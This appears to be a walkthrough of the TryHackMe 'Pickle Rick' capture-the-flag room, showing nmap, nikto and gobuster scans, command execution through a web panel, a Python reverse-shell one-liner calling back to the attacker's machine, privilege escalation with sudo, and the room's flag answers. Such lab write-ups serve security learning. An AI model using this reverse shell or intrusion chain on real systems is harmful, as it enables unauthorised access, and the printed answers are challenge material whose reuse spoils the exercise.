tryhackme pickle_rick_room_

Pickle rick is a room over tryhackme It's a free room any body can deploy the machine and have fun.

A Complete guide to solve the Room

The ip addr i got 10.10.40.75

Then i started the nmap scan for the IP and here are the result

COMMAND i used to scan the machine nmap -sC -sV 10.10.40.75 you can use (-vv) for better output

  nmap -sC -sV 10.10.40.75 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 16:17 IST
Nmap scan report for 10.10.40.75
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:52:73:f2:7c:50:d5:0b:61:6f:ef:e8:ce:7c:02:ed (RSA)
|   256 87:c5:3b:8a:dc:29:c7:66:8c:46:59:8f:58:da:3b:fc (ECDSA)
|_  256 3b:a3:4f:b5:bb:69:7a:03:7e:98:7a:e8:0f:c0:fb:fe (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds  

Okay from the scan we got that the machine is running the web server

So from their i run the ‘gobuster’ and ‘nikto’ scan over machine

Firstly the nikto scan command used nikto -h 10.10.40.75

Result are as follow

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.40.75
+ Target Hostname:    10.10.40.75
+ Target Port:        80
+ Start Time:         2021-04-08 16:39:05 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.

NOt much but we got a login page at /login.php

Next the GOBUSTER

COMMAND is gobuster dir --url http://10.10.40.75 -w /usr/share/dirb/wordlists/common.txt You can select any wordlist you want

Result

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.75
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/04/08 16:29:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess            (Status: 403) [Size: 295]
/assets               (Status: 301) [Size: 311] [--> http://10.10.40.75/assets/]
/index.html           (Status: 200) [Size: 1062]                                
/robots.txt           (Status: 200) [Size: 17]                                  
/server-status        (Status: 403) [Size: 299]                                 
                                                                                
===============================================================
2021/04/08 16:32:17 Finished

huh..! got the robots.txt

Okay let’s try again with -x flag

-x to specify any php or sh file

COMMAND goes as gobuster dir --url http://10.10.40.75 -w /usr/share/dirb/wordlists/common.txt -x php,sh

Result

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.75
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,sh
[+] Timeout:                 10s
===============================================================
2021/04/08 16:45:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.hta.php             (Status: 403) [Size: 294]
/.htaccess.sh         (Status: 403) [Size: 298]
/.hta.sh              (Status: 403) [Size: 293]
/.htpasswd            (Status: 403) [Size: 295]
/.htaccess.php        (Status: 403) [Size: 299]
/.htpasswd.php        (Status: 403) [Size: 299]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd.sh         (Status: 403) [Size: 298]
/assets               (Status: 301) [Size: 311] [--> http://10.10.40.75/assets/]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]                  
/index.html           (Status: 200) [Size: 1062]                                
/login.php            (Status: 200) [Size: 882]                                 
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                  
/robots.txt           (Status: 200) [Size: 17]                                  
/server-status        (Status: 403) [Size: 299]                                 
                                                                                
===============================================================
2021/04/08 16:53:50 Finished
===============================================================

Ohh bruh!!

got the portal.php Here we got a command panel

starting with basic cmd ls

Result

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Lets navigate to http://10.10.40.75/Sup3rS3cretPickl3Ingred.txt

oh ho We got the first flag baby

#TASK 1
what is the first ingredient rick need ?

mr. meeseek hair 

next navigated to http://10.10.40.75/clue.txt

Look around the file system for the other ingredient.

trying to get a reverse shell

By python3 we can get a reverse-shell

You can get the revshell script from pentestmonkey site

but here we can use the

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.235.199",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And start a listner on our machine to capture the shell it have a very simple command nc -lnvp 4444

We got a shell

sudo bash and we are root and you can have your all flag.

command to get to root.flag

cd /home 
ls 
rick
ubuntu
cd rick 
ls 
second ingredients
cat *             //to open the file 
1 jerry tear

#TASK 2
what is the second ingredient rick need ?
1 jerry tear

#TASK 3
what is the third ingredient rick need ?
fleeb juice